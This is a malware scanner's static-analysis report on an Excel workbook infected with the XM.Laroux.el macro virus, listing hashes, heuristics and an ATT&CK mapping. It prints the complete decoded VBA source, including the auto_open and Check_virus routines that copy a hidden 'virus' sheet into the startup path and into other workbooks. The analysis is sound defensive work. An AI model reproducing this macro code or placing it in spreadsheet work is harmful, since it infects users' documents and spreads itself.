XM.Laroux.el — Office (OLE) malware analysis

Static analysis result for SHA-256 739bb12833da3ee7…

MALICIOUS

Office (OLE)

Size: 49.5 KB
Created: 1998-12-15 20:02:35
Authoring application: Microsoft Excel
First seen: 2015-09-16
MD5: 45cc898fc1f2f9b916d7ce89fce1e520
SHA-1: 610fe7b27ab5d1aa608c8c239864c1c0852d90a6
SHA-256: 739bb12833da3ee7b17ca68d80486fb1510eb366cdf90408c8384623130e5d26
Risk Score: 88

Malware Insights

XM.Laroux.el · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file is an Excel 97 document containing VBA macros and is identified as the XM.Laroux.el macro virus. The auto_open macro sets up event handlers (Check_virus as the OnSheetActivate handler, plus OnTime timers) so the virus can spread further; Check_virus then replicates the virus by saving a copy as 'Virus.XLS' in the startup path. The 'laroux' marker and the explicit strings 'Macro Infected Document' and 'Virus Name: XM.Laroux.el' in the document body confirm its malicious nature.

Heuristics (3)

  • Excel 5 Laroux/Larou-CV macro-virus marker cluster (severity: critical; rule: OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: low; rule: OLE_VBA_AUTO)
    Matched line in script: Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2318 bytes
SHA-256: f5f6ea12adece008f312f3575a6111196c96ab5986dc6f613cf9b949a29cbf4a

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "virus"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "Check_virus"
    Application.OnTime TimeValue("10:00:00"), "MassageVirus"
    Application.OnTime TimeValue("12:00:00"), "MassageVirus"
    Application.OnTime TimeValue("15:00:00"), "MassageVirus"
    Application.OnTime TimeValue("20:00:00"), "MassageVirus"
End Sub

Sub Check_virus()
Attribute Check_virus.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "Virus.XLS")
    If m$ = "Virus.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        Sheets("virus").Visible = True
        Sheets("virus").Select
        Sheets("virus").Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "Virus.XLS", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir c4$
        Workbooks(n4$).Sheets("virus").Visible = False
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "Virus.xls!Check_virus"
    Case 1
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "virus" Then
            Workbooks("Virus.XLS").Sheets("virus").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks(n4$).Sheets("virus").Visible = False
        Else
        End If
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "Virus.xls!Check_virus"
    Case Else
End Select
End Sub